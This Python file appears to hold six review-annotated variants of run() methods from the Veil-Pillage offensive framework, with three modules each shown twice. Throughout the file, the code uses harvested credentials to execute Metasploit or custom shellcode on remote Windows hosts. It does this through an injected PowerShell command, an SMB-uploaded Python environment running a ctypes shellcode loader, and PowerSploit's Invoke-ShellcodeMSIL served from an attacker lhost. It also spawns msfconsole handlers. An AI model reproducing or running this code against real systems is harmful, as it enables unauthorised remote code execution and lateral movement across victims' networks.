def run(self):
    """Run a generated PowerShell command on every host in self.targets.

    The command comes from virtual.Payload().generate() and is executed
    through command_methods.executeCommand with the first credential pair
    in self.creds. One line is appended to self.output and one entry to
    self.cleanup per target.

    Review notes:
      * The plaintext password is concatenated into both self.output and
        self.cleanup, so anything that persists them holds a credential
        and needs the same access control as the credential itself.
      * The recorded cleanup command is "taskkill /f /im powershell.exe",
        which terminates every powershell.exe on the host, not only the
        process this module started.
    """
    # Only the first credential pair is ever used.
    username, password = self.creds[0]
    trigger = self.required_options["trigger_method"][0]
    spawn_flag = self.required_options["spawn_handler"][0]

    payload = virtual.Payload()

    # Metasploit payload/options take precedence over custom shellcode.
    if self.args.msfpayload:
        payload.shellcode.SetPayload([self.args.msfpayload, self.args.msfoptions])
    elif self.args.custshell:
        payload.shellcode.setCustomShellcode(self.args.custshell)

    ps_command = payload.generate()

    # Shellcode generation overwrites the banner, so print it again.
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    if spawn_flag.lower() == "true":
        handler_script = helpers.shellcodeToHandler(payload.shellcode)

        # An empty string is treated as "no handler script was produced".
        if handler_script != "":
            # NOTE(review): handler_script is spliced into a nested-quoted
            # shell string passed to os.system; a path containing a quote
            # character would change how the local shell parses it.
            tab_cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handler_script + "'\""
            os.system(tab_cmd)
            raw_input("\n\n [>] Press enter when handler is ready: ")

    kill_cmd = "taskkill /f /im powershell.exe"

    for target in self.targets:
        print(helpers.color(" [*] Triggering powershell command on " + target))

        command_methods.executeCommand(target, username, password, ps_command, trigger)

        report_line = "[*] Powershell inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + trigger + "\n"
        self.output += report_line

        # Cleanup entry format: action|target|user|password|command|trigger
        cleanup_fields = ["executeCommand", target, username, password, kill_cmd, trigger]
        self.cleanup += "|".join(cleanup_fields) + "\n"
def run(self):
    """Execute the generated PowerShell command on each configured target.

    Uses self.creds[0] as the only credential pair, builds the command
    with virtual.Payload, optionally opens a local terminal tab running
    msfconsole against the generated handler script, then calls
    command_methods.executeCommand once per target.

    Review notes:
      * self.output and self.cleanup both receive the password in clear
        text; treat whatever stores them as credential material.
      * The cleanup entry force-kills all powershell.exe processes on the
        target ("taskkill /f /im powershell.exe"), which also ends
        unrelated PowerShell sessions on that host.
    """
    username, password = self.creds[0]
    options = self.required_options
    trigger_method = options["trigger_method"][0]
    spawn_handler = options["spawn_handler"][0]

    ps_payload = virtual.Payload()

    if self.args.msfpayload:
        # Metasploit payload name plus its options.
        msf_spec = [self.args.msfpayload, self.args.msfoptions]
        ps_payload.shellcode.SetPayload(msf_spec)
    elif self.args.custshell:
        ps_payload.shellcode.setCustomShellcode(self.args.custshell)

    powershell_cmd = ps_payload.generate()

    # Re-print the banner; generation clobbers the screen.
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    wants_handler = spawn_handler.lower() == "true"
    if wants_handler:
        handler_path = helpers.shellcodeToHandler(ps_payload.shellcode)
        if handler_path != "":
            # NOTE(review): shell string assembled by concatenation and run
            # with os.system; handler_path is not quoted or validated here.
            os.system("gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handler_path + "'\"")
            raw_input("\n\n [>] Press enter when handler is ready: ")

    for target in self.targets:
        print(helpers.color(" [*] Triggering powershell command on " + target))

        command_methods.executeCommand(target, username, password, powershell_cmd, trigger_method)

        creds_text = username + ":" + password
        self.output += "[*] Powershell inject command triggered using creds '" + creds_text + "' on " + target + " with " + trigger_method + "\n"

        # Recorded for later replay: kill all powershell processes.
        kill_cmd = "taskkill /f /im powershell.exe"
        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + kill_cmd + "|" + trigger_method + "\n"
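def run(self):
    """Upload a Python environment to each target and run a 'python -c' command.

    For every host in self.targets this uploads 7za.exe and python.zip to
    C$\\Windows\\Temp\\ through smb.uploadFiles, extracts the archive, and
    runs python.exe with the base64-encoded shellcode. Each step is logged
    to self.output, and on success two entries are appended to
    self.cleanup (kill python.exe; remove the extracted directory, the
    archive and 7za.exe).

    The original body also had an `elif handlerPath.lower() != "none"`
    branch. handlerPath was a local initialised to "none" and only
    reassigned inside the spawn_handler branch, so that elif could never
    run; it is removed here with no change in behaviour.

    Review notes:
      * The plaintext password is written into self.output and
        self.cleanup on every path, including the failed-upload message.
      * Cleanup entries are appended only after both executeCommand calls
        return. If one raises after a successful upload, 7za.exe and
        python.zip stay in C:\\Windows\\Temp with no cleanup entry.
      * "taskkill /f /im python.exe" ends every python.exe on the host.
    """
    # Only the first credential pair is used.
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    spawnHandler = self.required_options["spawn_handler"][0]

    sc = shellcode.Shellcode()

    # Metasploit payload/options take precedence over custom shellcode.
    if self.args.msfpayload:
        sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
    elif self.args.custshell:
        sc.setCustomShellcode(self.args.custshell)

    # "string_escape" is a Python 2-only codec; it turns the escaped text
    # returned by generate() into raw bytes before base64 encoding.
    b64sc = base64.b64encode(sc.generate().decode("string_escape"))

    # Shellcode generation overwrites the banner, so print it again.
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    if spawnHandler.lower() == "true":
        handlerPath = helpers.shellcodeToHandler(sc)

        # An empty string is treated as "no handler script was produced".
        if handlerPath != "":
            # NOTE(review): handlerPath is concatenated into a shell string
            # for os.system without quoting or validation.
            cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\""
            os.system(cmd)
            raw_input("\n\n [>] Press enter when handler is ready: ")

    # Remote command that extracts the uploaded archive in place.
    unzipCommand = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"

    # Local path of the 7zip binary that gets uploaded.
    zipPath = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"

    # Remote command line for the extracted interpreter.
    pythonCMD = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (b64sc)

    # Local path of the minimal Python install that gets uploaded.
    pythonPath = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"

    for target in self.targets:

        uploadResult = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zipPath, pythonPath])

        if uploadResult == "success":
            self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"

            print(helpers.color(" [*] Triggering 7zip unzip command on " + target))
            command_methods.executeCommand(target, username, password, unzipCommand, triggerMethod)
            self.output += "[*] 7za unzip command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

            print(helpers.color(" [*] Triggering 'python -c' command on " + target))
            command_methods.executeCommand(target, username, password, pythonCMD, triggerMethod)
            self.output += "[*] 'python -c' inject command triggered using creds '" + username + ":" + password + "' on " + target + " with " + triggerMethod + "\n"

            # Cleanup entry format: action|target|user|password|command|trigger
            killCMD = "taskkill /f /im python.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + killCMD + "|" + triggerMethod + "\n"

            # Remove the extracted directory, the archive and 7za.exe.
            delCMD = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + delCMD + "|" + triggerMethod + "\n"

        else:
            self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + username + ":" + password + "' on " + target + "\n"
            print(helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to " + target + "\n", warning=True))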
def run(self):
    """Deliver PowerSploit's Invoke-ShellcodeMSIL script to all targets.

    Generates shellcode with shellcode.Shellcode, rewrites it into a
    comma-separated list, and passes the local Invoke-ShellcodeMSIL.ps1
    path plus the invocation string to
    delivery_methods.powershellHostTrigger for every host in
    self.targets. One report line and one cleanup entry are then recorded
    per target.

    Review notes:
      * The plaintext password is written to self.output and self.cleanup.
      * use_ssl is forwarded exactly as stored in required_options.
        NOTE(review): if that value is a string such as "false", the
        callee has to parse it rather than test truthiness - confirm.
      * A report line is appended for every target after the single
        powershellHostTrigger call; no per-target result is checked here.
      * The cleanup command kills every powershell.exe on the host.
    """
    # Only the first credential pair is used.
    username, password = self.creds[0]
    options = self.required_options
    trigger = options["trigger_method"][0]
    spawn_flag = options["spawn_handler"][0]
    use_ssl = options["use_ssl"][0]
    lhost = options["lhost"][0]

    sc = shellcode.Shellcode()

    # Metasploit payload/options take precedence over custom shellcode.
    if self.args.msfpayload:
        sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
    elif self.args.custshell:
        sc.setCustomShellcode(self.args.custshell)

    raw_sc = sc.generate()
    # Split on backslashes, rejoin with ",0", drop the first character.
    # Presumably turns "\x41\x42" into "0x41,0x42" - verify the format
    # generate() actually returns.
    segments = raw_sc.split("\\")
    sc_array = ",0".join(segments)[1:]

    # Shellcode generation overwrites the banner, so print it again.
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    if spawn_flag.lower() == "true":
        handler_script = helpers.shellcodeToHandler(sc)

        # An empty string is treated as "no handler script was produced".
        if handler_script != "":
            # NOTE(review): shell string built by concatenation for
            # os.system; handler_script is not quoted or validated.
            tab_cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handler_script + "'\""
            os.system(tab_cmd)
            raw_input("\n\n [>] Press enter when handler is ready: ")

    # Local copy of the PowerSploit script served to the targets.
    second_stage = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"

    # Invocation appended after the script is loaded on the target.
    script_args = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (sc_array,)

    delivery_methods.powershellHostTrigger(
        self.targets,
        username,
        password,
        second_stage,
        lhost,
        script_args,
        trigger,
        ssl=use_ssl,
    )

    kill_cmd = "taskkill /f /im powershell.exe"

    for target in self.targets:
        self.output += "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '" + username + ":" + password + "' on " + target + " using " + trigger + "\n"

        # Cleanup entry format: action|target|user|password|command|trigger
        self.cleanup += "|".join(["executeCommand", target, username, password, kill_cmd, trigger]) + "\n"
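def run(self):
    """Push a Python environment to each target and trigger 'python -c' there.

    Per target: upload 7za.exe and python.zip to C$\\Windows\\Temp\\ with
    smb.uploadFiles, run the unzip command, then run python.exe with the
    base64-encoded shellcode, logging each step to self.output. On a
    successful upload two cleanup entries are recorded (kill python.exe,
    delete the uploaded and extracted files).

    Change from the original: the `elif handlerPath.lower() != "none"`
    branch and its `else: pass` were unreachable, because handlerPath
    started as "none" and was reassigned only inside the spawn_handler
    branch. They are dropped; runtime behaviour is unchanged.

    Review notes:
      * Every self.output / self.cleanup line embeds the plaintext
        password; store those buffers as credential material.
      * A failed upload is logged but leaves no cleanup entry, and the
        upload result is compared only to the literal "success".
        NOTE(review): whether a partial upload can leave one file behind
        depends on smb.uploadFiles - confirm.
      * The recorded kill command is not scoped to the spawned process.
    """
    username, password = self.creds[0]
    trigger = self.required_options["trigger_method"][0]
    spawn_flag = self.required_options["spawn_handler"][0]

    sc = shellcode.Shellcode()

    # Metasploit payload/options take precedence over custom shellcode.
    if self.args.msfpayload:
        sc.SetPayload([self.args.msfpayload, self.args.msfoptions])
    elif self.args.custshell:
        sc.setCustomShellcode(self.args.custshell)

    # Python 2 "string_escape" codec: escaped text -> raw bytes -> base64.
    raw_bytes = sc.generate().decode("string_escape")
    b64sc = base64.b64encode(raw_bytes)

    # Shellcode generation overwrites the banner, so print it again.
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    if spawn_flag.lower() == "true":
        handler_script = helpers.shellcodeToHandler(sc)

        # An empty string is treated as "no handler script was produced".
        if handler_script != "":
            # NOTE(review): unquoted path concatenated into an os.system
            # shell string on the operator's machine.
            os.system("gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handler_script + "'\"")
            raw_input("\n\n [>] Press enter when handler is ready: ")

    # Local files that get uploaded.
    zip_binary = settings.VEIL_PILLAGE_PATH + "/data/environments/7za.exe"
    python_archive = settings.VEIL_PILLAGE_PATH + "/data/environments/python.zip"

    # Remote command lines (extract archive, then run the interpreter).
    unzip_cmd = "C:\\\\Windows\\\\Temp\\\\7za.exe x -y -oC:\\\\Windows\\\\Temp\\\\ C:\\\\Windows\\\\Temp\\\\python.zip"
    python_cmd = "C:\\\\Windows\\\\Temp\\\\python\\\\python.exe -c \"from ctypes import *;a=\\\"%s\\\".decode(\\\"base_64\\\");cast(create_string_buffer(a,len(a)),CFUNCTYPE(c_void_p))()\"" % (b64sc)

    # Commands recorded for later cleanup.
    kill_cmd = "taskkill /f /im python.exe"
    del_cmd = "rmdir c:\\Windows\\Temp\\Python /s /q & del C:\\Windows\\Temp\\python.zip & del C:\\Windows\\Temp\\7za.exe"

    for target in self.targets:
        creds_text = username + ":" + password

        upload_result = smb.uploadFiles(target, username, password, "C$", "\\Windows\\Temp\\", [zip_binary, python_archive])

        if upload_result != "success":
            self.output += "[!] 7za.exe and python.zip unsuccessfully uploaded using creds '" + creds_text + "' on " + target + "\n"
            print(helpers.color("[!] 7za.exe and python.zip unsuccessfully uploaded to " + target + "\n", warning=True))
            continue

        self.output += "[*] 7za.exe and python.zip successfully uploaded using creds '" + creds_text + "' on " + target + "\n"

        print(helpers.color(" [*] Triggering 7zip unzip command on " + target))
        command_methods.executeCommand(target, username, password, unzip_cmd, trigger)
        self.output += "[*] 7za unzip command triggered using creds '" + creds_text + "' on " + target + " with " + trigger + "\n"

        print(helpers.color(" [*] Triggering 'python -c' command on " + target))
        command_methods.executeCommand(target, username, password, python_cmd, trigger)
        self.output += "[*] 'python -c' inject command triggered using creds '" + creds_text + "' on " + target + " with " + trigger + "\n"

        # Cleanup entry format: action|target|user|password|command|trigger
        entry_prefix = "executeCommand|" + target + "|" + username + "|" + password + "|"
        self.cleanup += entry_prefix + kill_cmd + "|" + trigger + "\n"
        self.cleanup += entry_prefix + del_cmd + "|" + trigger + "\n"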
def run(self):
    """Trigger PowerSploit's Invoke-ShellcodeMSIL on every target host.

    Shellcode from shellcode.Shellcode is reformatted into a
    comma-separated list and embedded in the invocation string handed,
    together with the local script path and lhost, to
    delivery_methods.powershellHostTrigger. self.output and self.cleanup
    then receive one line per target.

    Review notes:
      * self.output and self.cleanup contain the password in clear text.
      * The ssl= argument is whatever required_options["use_ssl"][0]
        holds. NOTE(review): confirm the callee interprets a string value
        correctly, since a non-empty "false" is truthy.
      * Report lines are written unconditionally after the trigger call;
        they do not show that a given target actually ran the script.
      * Cleanup force-kills all powershell.exe processes on the host.
    """
    username, password = self.creds[0]
    trigger_method = self.required_options["trigger_method"][0]
    spawn_handler = self.required_options["spawn_handler"][0]
    use_ssl = self.required_options["use_ssl"][0]
    lhost = self.required_options["lhost"][0]

    sc = shellcode.Shellcode()

    if self.args.msfpayload:
        # Metasploit payload name plus its options.
        msf_spec = [self.args.msfpayload, self.args.msfoptions]
        sc.SetPayload(msf_spec)
    elif self.args.custshell:
        sc.setCustomShellcode(self.args.custshell)

    generated = sc.generate()
    # Backslash-split, ",0"-join, then strip the leading character.
    # Presumably maps "\x41\x42" to "0x41,0x42" - verify against the
    # format generate() returns.
    sc_list = ",0".join(generated.split("\\"))[1:]

    # Re-print the banner; generation clobbers the screen.
    messages.title()
    sys.stdout.write(" [*] Executing module: " + helpers.color(self.name) + "...")

    wants_handler = spawn_handler.lower() == "true"
    if wants_handler:
        handler_path = helpers.shellcodeToHandler(sc)
        if handler_path != "":
            # NOTE(review): handler_path goes into an os.system shell
            # string without quoting or validation.
            os.system("gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handler_path + "'\"")
            raw_input("\n\n [>] Press enter when handler is ready: ")

    script_path = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-ShellcodeMSIL.ps1"
    invocation = "Invoke-ShellcodeMSIL -Shellcode @(%s)" % (sc_list,)

    delivery_methods.powershellHostTrigger(self.targets, username, password, script_path, lhost, invocation, trigger_method, ssl=use_ssl)

    for target in self.targets:
        creds_text = username + ":" + password
        self.output += "[*] Powersploit:Invoke-ShellcodeMSIL triggered using creds '" + creds_text + "' on " + target + " using " + trigger_method + "\n"

        # Recorded for later replay: kill all powershell processes.
        kill_cmd = "taskkill /f /im powershell.exe"
        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + kill_cmd + "|" + trigger_method + "\n"